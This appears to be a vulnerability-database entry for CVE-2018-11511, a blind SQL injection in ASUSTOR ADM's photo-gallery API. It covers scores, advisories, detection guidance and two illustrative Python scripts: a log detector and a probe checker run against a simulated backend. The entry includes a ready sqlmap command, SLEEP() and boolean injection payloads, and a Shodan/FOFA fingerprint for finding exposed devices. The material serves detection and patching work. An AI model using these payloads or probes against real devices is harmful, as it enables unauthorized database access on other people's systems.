CVE-2018-11511
Published: 2018-08-16
Priority: P1 (79) · critical · 9.8 (CVSS 3.0)
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploited in the wild (ITW) · public exploit · VulnCheck KEV
EPSS: 11.18% (95.4th percentile)
The tree list functionality in the photo gallery application in ASUSTOR ADM 3.1.0.RFQ3 has a SQL injection vulnerability that affects the 'album_id' or 'scope' parameter via a photo-gallery/api/album/tree_lists/ URI.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| asustor | asustor_data_master (ADM) | 3.1.0.RFQ3 and all previous builds (per the Exploit-DB advisory; the database records no range) | 3.1.3 (per the advisory) |
Detection & IOCs (extracted from sources)

sqlmap invocation against the album_id parameter of the tree_lists endpoint:

```shell
sqlmap -u "https://<TARGET>/photo-gallery/api/album/tree_lists/" --data="album_id=123456789&start=0&limit=100&order=name_asc&api=v2" --random-agent --risk=2 --dbms=mysql
```

Time-based POST bodies observed in the sources (SLEEP() against scope at /photo-gallery/api/photo/search/ and against album_id at /photo-gallery/api/album/tree_lists/):

```
keyword=jpg&scope=106299414 AND SLEEP(5)&start=0&limit=100&order=name_asc&api_mode=browse&api=v2
album_id=106298411+AND+SLEEP(9)&start=0&limit=100&order=name_asc&api=v2
keyword=jpg&scope=106298414+AND+SLEEP(9)&start=0&limit=100&order=name_asc&api_mode=browse&api=v2
```
- Detect time-based blind SQLi attempts against the album_id POST parameter at /photo-gallery/api/album/tree_lists/: look for SLEEP() payloads in the POST body, correlated with a response time of 9 seconds or more.
- Detect time-based blind SQLi attempts against the scope POST parameter at /photo-gallery/api/photo/search/: look for SLEEP() payloads in the POST body.
- Boolean-based blind SQLi can also be detected via AND-clause payloads such as 'AND 4644=4644' in the album_id parameter.
- FOFA/Shodan fingerprinting identifies exposed ASUSTOR ADM instances (attackers use it for target selection; the same query finds your own exposure): search for a body containing 'ASUSTOR' with icon_hash '1678170702'.
- Both vulnerable endpoints (/photo-gallery/api/album/tree_lists/ and /photo-gallery/api/photo/search/) take POST requests with Content-Type: application/x-www-form-urlencoded; detection that only inspects GET requests or the query string will miss this vulnerability.
- The vulnerability affects ASUSTOR ADM 3.1.0.RFQ3 and all previous builds. The companion RCE (CVE-2018-11510) was patched in ADM 3.1.3 on May 31, 2018; the SQLi (CVE-2018-11511) should also be addressed by upgrading to ADM 3.1.3.
- The SQLi is blind (both boolean-based and time-based): no error output is returned, so detection relies on response timing or on differential boolean responses rather than on error messages.
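The detection guidance above, as an added example written for this page (it is not from the page's sources nor from any SIEM or IDS vendor): a small Python detector that applies the rules to access-log lines. The log format, the sample lines and the client addresses are assumptions constructed for the example; the endpoints, parameter names and payload shapes are the advisory's. It parses POST bodies (and, so that GET probes are not silently dropped, query strings) for the two endpoints, classifies the injectable parameter as time-based or boolean-based, and marks a time-based attempt as confirmed only when the logged response time is at least the SLEEP() duration the payload asked for.

```python
import re
from urllib.parse import parse_qs

# Injectable parameter for each vulnerable endpoint (from the advisory).
WATCHED = {
    "/photo-gallery/api/album/tree_lists/": "album_id",
    "/photo-gallery/api/photo/search/": "scope",
}

# SLEEP(n): capture n so the logged latency can be compared with it.
SLEEP_RE = re.compile(r"\bsleep\s*\(\s*(\d+(?:\.\d+)?)\s*\)", re.I)
# Boolean probes such as "AND 4644=4644" (true) or "AND 4644=4645" (false).
BOOL_RE = re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I)

# Constructed log format (an assumption; the page defines no log format):
# <timestamp> <client> <method> <path> <status> <seconds> "<request body>"
LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<path>\S+) '
    r'(?P<status>\d{3}) (?P<secs>[\d.]+) "(?P<body>.*)"$'
)


def classify_value(value):
    """Return (kind, requested_sleep) for one parameter value; kind is None when benign."""
    v = value.strip()
    if v.isdigit():
        return None, None              # a bare numeric id is the expected shape
    m = SLEEP_RE.search(v)
    if m:
        return "time-based", float(m.group(1))
    if BOOL_RE.search(v):
        return "boolean-based", None
    return "non-numeric", None         # anything else in a numeric id deserves a look


def inspect_request(src, method, path, body, secs):
    """Inspect one request; returns a list of findings (empty when nothing is suspicious)."""
    base, _, query = path.partition("?")
    param = WATCHED.get(base)
    if param is None:
        return []
    # The real attack is a POST body; the query string is parsed too so a
    # GET probe still shows up as an attempt instead of being missed.
    raw = body if method == "POST" else query
    findings = []
    # parse_qs decodes '+' and %xx, so "1+AND+SLEEP(9)" becomes "1 AND SLEEP(9)".
    for value in parse_qs(raw, keep_blank_values=True).get(param, []):
        kind, delay = classify_value(value)
        if kind is None:
            continue
        # A time-based attempt is only "confirmed" when the server really stalled.
        confirmed = delay is not None and secs >= delay
        findings.append({"src": src, "endpoint": base, "param": param, "kind": kind,
                         "payload": value, "secs": secs, "confirmed": confirmed})
    return findings


def scan_log(text):
    """Run inspect_request over every parseable line of an access log."""
    results = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            results.extend(inspect_request(m["src"], m["method"], m["path"],
                                           m["body"], float(m["secs"])))
    return results


def confirmed_sources(findings):
    """Client addresses whose payload produced a measurable server-side delay."""
    return {f["src"] for f in findings if f["confirmed"]}


# Constructed sample log (not captured traffic); payloads mirror the advisory's IOCs.
SAMPLE_LOG = """\
2024-05-01T10:00:00Z 203.0.113.5 POST /photo-gallery/api/album/tree_lists/ 200 0.12 "album_id=106298411&start=0&limit=100&order=name_asc&api=v2"
2024-05-01T10:00:01Z 203.0.113.5 POST /photo-gallery/api/album/tree_lists/ 200 9.31 "album_id=106298411+AND+SLEEP(9)&start=0&limit=100&order=name_asc&api=v2"
2024-05-01T10:00:02Z 203.0.113.5 POST /photo-gallery/api/album/tree_lists/ 200 0.10 "album_id=106298411+AND+4644=4644&start=0&limit=100&order=name_asc&api=v2"
2024-05-01T10:00:03Z 203.0.113.5 POST /photo-gallery/api/photo/search/ 200 5.08 "keyword=jpg&scope=106299414 AND SLEEP(5)&start=0&limit=100&order=name_asc&api_mode=browse&api=v2"
2024-05-01T10:00:04Z 203.0.113.5 GET /photo-gallery/api/album/tree_lists/?album_id=1+AND+SLEEP(9) 200 0.01 ""
2024-05-01T10:00:05Z 198.51.100.7 POST /photo-gallery/api/photo/search/ 200 0.09 "keyword=jpg&scope=106299414&start=0&limit=100&order=name_asc&api_mode=browse&api=v2"
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['src']} {f['endpoint']} {f['param']}={f['payload']!r} "
              f"{f['kind']} secs={f['secs']} confirmed={f['confirmed']}")
    print("confirmed sources:", confirmed_sources(scan_log(SAMPLE_LOG)))
```

On the sample the GET probe is reported as an attempt but not confirmed (the endpoint does not run the query for GET, so no delay is observed), which is the distinction an alert should carry: an attempt shows intent, a confirmed delay shows the target is unpatched.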
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.0 | 9.8 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| NVD | 2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| VulnCheck | n/a | 9.8 | CRITICAL | n/a |
GHSA
GHSA-8ccp-76j3-r8wf (ghsa_unreviewed, 2022-05-14) · CVE-2018-11511 [CRITICAL] · CWE-89
The tree list functionality in the photo gallery application in ASUSTOR ADM 3.1.0.RFQ3 has a SQL injection vulnerability that affects the 'album_id' or 'scope' parameter via a photo-gallery/api/album/tree_lists/ URI.
VulnCheck
vulncheck · 2018 · CVSS 9.8 · CVE-2018-11511 [CRITICAL]
asustor asustor_data_master: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
The tree list functionality in the photo gallery application in ASUSTOR ADM 3.1.0.RFQ3 has a SQL injection vulnerability that affects the 'album_id' or 'scope' parameter via a photo-gallery/api/album/tree_lists/ URI.
Affected: asustor asustor_data_master
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References:
- https://blogs.juniper.net/en-us/threat-research/everything-but-the-kitchen-sink-more-attacks-from-the-gitpaste-12-worm
- https://app.crowdsec.net/cti/cve-explorer/CVE-2018-11511
- https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/
No detection rules found.
Exploit-DB
exploitdb · 2018-08-15 · CVSS 9.8 · CVE-2018-11511 [CRITICAL]
ASUSTOR ADM 3.1.0.RFQ3 - Remote Command Execution / SQL Injection
---
Product - ASUSTOR ADM - 3.1.0.RFQ3 and all previous builds
Vendor - https://www.asustor.com/
Patch Notes - http://download.asustor.com/download/docs/releasenotes/RN_ADM_3.1.3.RHU2.pdf
Issue: The Asustor NAS appliance on ADM 3.1.0 and before suffers from multiple critical vulnerabilities. The vulnerabilities were submitted to Asustor in January and February 2018. Several follow-up requests were made in an attempt to obtain vendor acknowledgement, however no correspondence was ever received. Nevertheless, the vendor did patch the RCE issue in the 3.1.3 ADM release on May 31, 2018.
Resolution: Upgrade to newest Asustor firmware, ADM 3.1.3.
CVE-2018-11510
Remote Command Execution (Unauthenticated)
CWE-78 - Improper Neutr
Nuclei
nuclei · CVSS 9.8 · CVE-2018-11511 [CRITICAL]
ASUSTOR ADM 3.1.0.RFQ3 - SQL Injection
ASUSTOR ADM version 3.1.0.RFQ3 is vulnerable to SQL injection via the album_id parameter in the /photo-gallery/api/album/tree_lists/ endpoint. An attacker can exploit this vulnerability to execute arbitrary SQL commands on the database, potentially leading to information disclosure or further compromise of the affected system.
Template:

```yaml
id: CVE-2018-11511
info:
  name: ASUSTOR ADM 3.1.0.RFQ3 - SQL Injection
  author: ritikchaddha
  severity: critical
  description: |
    ASUSTOR ADM version 3.1.0.RFQ3 is vulnerable to SQL injection via the album_id parameter in the /photo-gallery/api/album/tree_lists/ endpoint. An attacker can exploit this vulnerability to execute arbitrary SQL commands on the database, potentially leading to information disclosure or further
```
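As an added example of the check a template like the one above automates, written for this page rather than taken from the Nuclei template or from ASUSTOR's code: the time-based and boolean-based probes from the advisory, run against a stand-in backend. The `FakeAdm` class, its `album` table, the simulated `SLEEP()` and the `send(path, body)` transport contract are constructed for the example; the endpoints, parameter names, request bodies and payloads are the page's. The stand-in shows the vulnerable string concatenation beside the bound-parameter fix, and the check itself shows why a baseline measurement belongs in any time-based test.

```python
import sqlite3
import time
from urllib.parse import parse_qs, quote_plus

# Vulnerable endpoints and their injectable parameter (from the advisory).
TREE_LISTS = "/photo-gallery/api/album/tree_lists/"
SEARCH = "/photo-gallery/api/photo/search/"
ENDPOINTS = {TREE_LISTS: "album_id", SEARCH: "scope"}


def tree_lists_body(album_id):
    """Form body for tree_lists; quote_plus gives the '+AND+SLEEP(9)' shape seen in the IOCs."""
    return f"album_id={quote_plus(album_id)}&start=0&limit=100&order=name_asc&api=v2"


def search_body(scope):
    """Form body for photo/search with the injectable scope parameter."""
    return (f"keyword=jpg&scope={quote_plus(scope)}&start=0&limit=100"
            "&order=name_asc&api_mode=browse&api=v2")


def time_based_check(send, path, make_body, base_id="106298411", delay=9, repeats=2, margin=0.5):
    """Time-based blind check. send(path, body) -> (status, text, seconds) is the
    assumed transport. The slowest baseline and the fastest injected response must
    still differ by about `delay`, so ordinary latency jitter cannot confirm anything."""
    baseline = max(send(path, make_body(base_id))[2] for _ in range(repeats))
    injected = min(send(path, make_body(f"{base_id} AND SLEEP({delay})"))[2]
                   for _ in range(repeats))
    return {"baseline": baseline, "injected": injected,
            "vulnerable": injected - baseline >= delay - margin}


def boolean_check(send, path, make_body, base_id="106298411"):
    """Boolean-based blind check: a true clause must reproduce the plain response
    and a false clause must change it. All three equal means the value never
    reaches the query as SQL (or the id simply returns nothing)."""
    plain = send(path, make_body(base_id))[1]
    true_ = send(path, make_body(f"{base_id} AND 4644=4644"))[1]
    false_ = send(path, make_body(f"{base_id} AND 4644=4645"))[1]
    return {"vulnerable": plain == true_ and plain != false_}


class FakeAdm:
    """Stand-in backend (constructed for this example; not ASUSTOR code).
    safe=False concatenates the parameter into SQL (the CWE-89 pattern);
    safe=True binds it, which is the fix."""

    def __init__(self, safe):
        self.safe = safe
        self.slept = 0.0
        self.db = sqlite3.connect(":memory:")
        # MySQL-style SLEEP(): account for the delay instead of blocking the run.
        self.db.create_function("SLEEP", 1, self._sleep)
        self.db.executescript(
            "CREATE TABLE album(id INTEGER, name TEXT);"
            "INSERT INTO album VALUES (106298411, 'Holiday'), (106299414, 'Pets');"
        )

    def _sleep(self, n):
        self.slept += float(n)
        return 0  # MySQL SLEEP() returns 0 after waiting, so the AND clause is false

    def post(self, path, body):
        """Transport with the send(path, body) -> (status, text, seconds) contract."""
        value = parse_qs(body, keep_blank_values=True).get(ENDPOINTS[path], [""])[0]
        self.slept = 0.0
        start = time.perf_counter()
        if self.safe:
            rows = self.db.execute("SELECT name FROM album WHERE id = ?", (value,)).fetchall()
        else:  # vulnerable: the decoded value becomes part of the SQL text
            rows = self.db.execute(f"SELECT name FROM album WHERE id = {value}").fetchall()
        return 200, repr(rows), time.perf_counter() - start + self.slept


if __name__ == "__main__":
    for label, backend in (("vulnerable", FakeAdm(safe=False)), ("fixed", FakeAdm(safe=True))):
        for path, body, base in ((TREE_LISTS, tree_lists_body, "106298411"),
                                 (SEARCH, search_body, "106299414")):
            print(label, path,
                  time_based_check(backend.post, path, body, base_id=base),
                  boolean_check(backend.post, path, body, base_id=base))
```

Against a real target `send` would wrap an HTTP client posting `application/x-www-form-urlencoded` to the NAS and timing the round trip; the check logic does not change. The bound-parameter branch is what the fix looks like on the server side: the same payloads reach the database as a single string that matches no id, and the timing difference disappears.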
No writeups or analysis indexed.
References
- http://packetstormsecurity.com/files/148919/ASUSTOR-NAS-ADM-3.1.0-Remote-Command-Execution-SQL-Injection.html
- https://www.exploit-db.com/exploits/45200/